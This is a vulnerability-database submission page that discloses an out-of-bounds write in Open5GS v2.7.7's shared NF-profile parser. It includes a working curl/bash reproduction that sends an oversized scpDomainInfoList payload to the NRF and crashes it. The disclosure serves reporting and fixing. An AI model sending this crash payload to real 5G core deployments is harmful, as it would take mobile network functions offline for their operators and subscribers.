提交 #818582: Open5GS AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR、SCP、SEPP、NRF v2.7.7 Denial of Service信息

标题	Open5GS AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR、SCP、SEPP、NRF v2.7.7 Denial of Service
描述	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across multiple network functions. In `handle_scp_info()`, each attacker-controlled SCP domain is copied into a fixed array without checking `OGS_MAX_NUM_OF_SCP_DOMAIN`: ```c scp_info.domain[scp_info.num_of_domain].name = ogs_strdup(DomainInfoMap->key); ... scp_info.num_of_domain++; ``` This leads to an out-of-bounds write at `../lib/sbi/nnrf-handler.c:591` and nearby lines (around `588-626` depending on build). In confirmed runs the failure mode is a segmentation fault / stack-smashing termination rather than a graceful validation error. This is a shared parser bug, not an NRF-only bug(AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR、SCP、SEPP). A direct reproduction is shown below against NRF because it is the shortest setup, but the same handler is also reachable from other NF-profile parsing paths such as `nf-status-notify` and discovery responses consumed by other Open5GS network functions. ### Root cause - Crash site: out-of-bounds write around `../lib/sbi/nnrf-handler.c:591` - Bug class: fixed-size `scp_info.domain[]` overflow - Controlling field: `NFProfile.scpInfo.scpDomainInfoList` ### Steps to reproduce ```bash NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf) payload=$(cat <<'EOF' {"nfInstanceId":"fake-scp-nrf","nfType":"SCP","nfStatus":"REGISTERED","scpInfo":{"scpDomainInfoList":{"d0":{},"d1":{},"d2":{},"d3":{},"d4":{},"d5":{},"d6":{},"d7":{},"d8":{},"d9":{},"d10":{},"d11":{},"d12":{},"d13":{},"d14":{},"d15":{},"d16":{},"d17":{},"d18":{},"d19":{},"d20":{},"d21":{},"d22":{},"d23":{},"d24":{},"d25":{},"d26":{},"d27":{},"d28":{},"d29":{},"d30":{},"d31":{}}}} EOF ) curl --http2-prior-knowledge -m 5 -sS -i \ -X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-scp-nrf" \ -H 'content-type: application/json' \ --data "$payload" docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf docker logs --tail 20 nrf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T17:17:35.255649473Z No HTTP error was returned to the client; the NRF process exited immediately after the request. ``` ### Expected behaviour Open5GS should reject excessive `scpDomainInfoList` entries before writing past `OGS_MAX_NUM_OF_SCP_DOMAIN`, and it should never let peer-controlled NF-profile data corrupt memory. ### Observed Behaviour The request corrupts memory and terminates the process with exit code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
来源	⚠️ https://github.com/open5gs/open5gs/issues/4468
用户	ZiyuLin (UID 93568)
提交	2026-05-04 04時56分 (1 月前)
管理	2026-05-29 19時15分 (26 days later)
状态	已接受
VulDB条目	367292 [Open5GS 直到 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c handle_scp_info 内存损坏]
积分	20

◂ 上一步一览下一步 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!